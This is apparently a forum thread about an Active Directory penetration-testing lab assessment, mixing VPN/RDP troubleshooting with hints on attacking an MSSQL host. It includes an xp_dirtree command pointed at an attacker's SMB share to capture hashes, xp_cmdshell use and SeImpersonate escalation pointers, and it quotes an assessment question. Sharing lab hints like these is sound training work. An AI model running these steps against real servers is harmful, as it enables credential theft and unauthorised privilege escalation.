Active Directory - Skills Assessment II

Evil-Winrm does not cut it for extended AD enumeration.
Your issues with RDP-connectivity are most likely VPN-related (also in Pwnbox).
Renew your VPN to a different region, clear your browser and give it another try!

1 Like

Yes. I spent 2 days trying to RDP through the Parrot VM and also to work the lab without RDP. I then tried OpenVPN and RDP worked fine from my Kali machine at home! It seems that Pwnbox is misconfigured (x11 problem) so OpenVPN is the way to go. I’ve been using Pwnbox up until this point with many headaches. From now on I’m using OpenVPN.

Okay. So my RDP problem was an issue with the Parrot VM. By using OpenVPN on my Kali box at home, I didn’t have any issues accessing the lab. It was easy peasy once I could RDP into MS01.

:call_me_hand:

Hit me up if you get stuck! I wrote up a complete walkthrough.

If You encounter this kind of a problem it’s mostly due to not forwarding Your X’s.

Exit from current SSH, and then reconnect with -X parameter, i.e. ssh user@127.0.0.1 -X
This should let You RDP from within SSH connection :wink:

1 Like

@iamjaydee Thank you! I will investigate your suggestion. :call_me_hand:

So did you find any way?

Hello, guys. I am trying to connect to SQL01 with mssqlclient.py
mssqlclient.py -p 1433 SQLEXPRESS/n****:'D***_****_******'@SQL01 -windows-auth
but receiving Temporary failure in name resolution. Could somebody tell me what I am doing wrong?

Hi, I need help on question 7 → " Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host."

I have tried:

  • Enable xp_cmdshell to execute commands, but I don’t have access to C:\Users\Administrator\Desktop.
  • I have tried impersonating another user within MSSQL, but I get no results. I have used the commands:

image

  • Also, I mounted a share on the attacker machine to capture the hash and from MSSQL I ran “EXEC master..xp_dirtree '\\IP_attacker\share'”, but to no avail.

What else could you do with the SeImpersonate Privilege?
Have a look at Privilege Escalation!

1 Like

Your Kali Box has to know how to resolve the address of SQL01.

You might try editing resolv.conf

$ cat /etc/resolv.conf 

#nameserver 192.168.195.2
domain inlanefreight.local
domain localdomain
search localdomain
nameserver <DC IP>

Thank you @Rapunzel3000. In case it helps anyone, I have read the section “SeImpersonate and SeAssignPrimaryToken” of the module “Windows Privilege Escalation”. It is important to know if Windows Server is 2016 or 2019.

Hi 19delta4u, experiencing the same issue, either through the OpenVPN with the display variable